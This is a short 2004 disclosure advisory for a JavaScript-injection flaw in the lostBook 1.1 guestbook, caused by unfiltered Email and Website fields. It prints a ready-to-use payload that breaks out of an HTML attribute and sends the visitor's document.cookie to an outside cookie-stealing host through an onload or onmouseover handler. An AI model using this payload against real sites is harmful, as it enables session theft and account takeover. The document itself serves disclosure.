Product: lostBook vendor: veryLost (verylost.tk) Affected Versions: 1.1 and lower Description: A simple flat db guestbook Vulnerabilities: XSS Date: July 29, 2004 Vuln Finder: r3d5pik3 (me) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1.) About 2.) Javascript Execution 3.) Vendor Notice -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (o_O)oOoOoOo [ About ] oOoOoOo(O_o)
Ok the only reason i consider this javascript execution instead of XSS. Is simply because you cant inject html like you can in most XSS vulnrabilities.
On the write entry page of the guest book there are 4 fields: Name, Email, Website, Entry. The Email and Website feild go through no filtering, and a malicous hacker could use that to insert javascript.
Example: The Website data gets parsed like so if(isset($web) && $web != "" && $web != " ") echo ' ';
An attacker would go about injecting xss by the following ways. Inputting the following into either email or website field. r3d5pik3.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie if onload doesnt work they could simply use onmouseover instead -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
